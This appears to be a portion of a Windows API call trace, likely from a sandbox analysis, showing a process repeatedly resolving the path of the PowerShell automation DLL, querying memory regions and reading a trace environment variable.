	[0089.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.418] GetLastError () returned 0xcb
	[0089.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.418] GetLastError () returned 0xcb
	[0089.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.418] GetLastError () returned 0xcb
	[0089.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.419] GetLastError () returned 0xcb
	[0089.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.419] GetLastError () returned 0xcb
	[0089.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.419] GetLastError () returned 0xcb
	[0089.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.419] GetLastError () returned 0xcb
	[0089.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.419] GetLastError () returned 0xcb
	[0089.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.419] GetLastError () returned 0xcb
	[0089.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.419] GetLastError () returned 0xcb
	[0089.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.419] GetLastError () returned 0xcb
	[0089.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.419] GetLastError () returned 0xcb
	[0089.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.419] GetLastError () returned 0xcb
	[0089.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.419] GetLastError () returned 0xcb
	[0089.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.419] GetLastError () returned 0xcb
	[0089.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.419] GetLastError () returned 0xcb
	[0089.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.420] GetLastError () returned 0xcb
	[0089.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.420] GetLastError () returned 0xcb
	[0089.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.420] GetLastError () returned 0xcb
	[0089.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.420] GetLastError () returned 0xcb
	[0089.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dae4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.426] GetLastError () returned 0xcb
	[0089.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.426] GetLastError () returned 0xcb
	[0089.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.427] GetLastError () returned 0xcb
	[0089.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.427] GetLastError () returned 0xcb
	[0089.444] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.445] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.445] GetLastError () returned 0xcb
	[0089.446] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.452] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.452] GetLastError () returned 0xcb
	[0089.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.453] GetLastError () returned 0xcb
	[0089.455] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.455] GetLastError () returned 0xcb
	[0089.458] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.458] GetLastError () returned 0xcb
	[0089.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.459] GetLastError () returned 0xcb
	[0089.460] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.461] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.476] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.476] GetLastError () returned 0xcb
	[0089.482] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.484] GetLastError () returned 0xcb
	[0089.582] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x352080
	[0089.582] GetLastError () returned 0x0
	[0089.582] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x352108
	[0089.582] GetLastError () returned 0x0
	[0089.637] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.648] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.650] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.650] VirtualQuery (in: lpAddress=0x14c6c4, lpBuffer=0x14d6c4, dwLength=0x1c | out: lpBuffer=0x14d6c4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.663] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.663] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.663] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.663] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.663] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.663] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.663] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.663] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.664] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.664] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.664] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.664] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.664] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.664] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.664] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.664] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.664] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.664] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.664] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.664] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.665] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.665] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.665] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.665] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.665] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.665] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.665] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.665] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.665] VirtualQuery (in: lpAddress=0x14d010, lpBuffer=0x14e010, dwLength=0x1c | out: lpBuffer=0x14e010*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.666] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.666] GetLastError () returned 0xcb
	[0089.668] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.668] GetLastError () returned 0xcb
	[0089.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.668] GetLastError () returned 0xcb
	[0089.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ddbc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.668] GetLastError () returned 0xcb
	[0089.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ddbc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.669] GetLastError () returned 0xcb
	[0089.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ddbc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.669] GetLastError () returned 0xcb
	[0089.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.686] GetLastError () returned 0xcb
	[0089.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ddbc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.686] GetLastError () returned 0xcb
	[0089.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ddbc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.687] GetLastError () returned 0xcb
	[0089.687] VirtualQuery (in: lpAddress=0x14d338, lpBuffer=0x14e338, dwLength=0x1c | out: lpBuffer=0x14e338*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.687] GetLastError () returned 0xcb
	[0089.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ddbc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.687] GetLastError () returned 0xcb
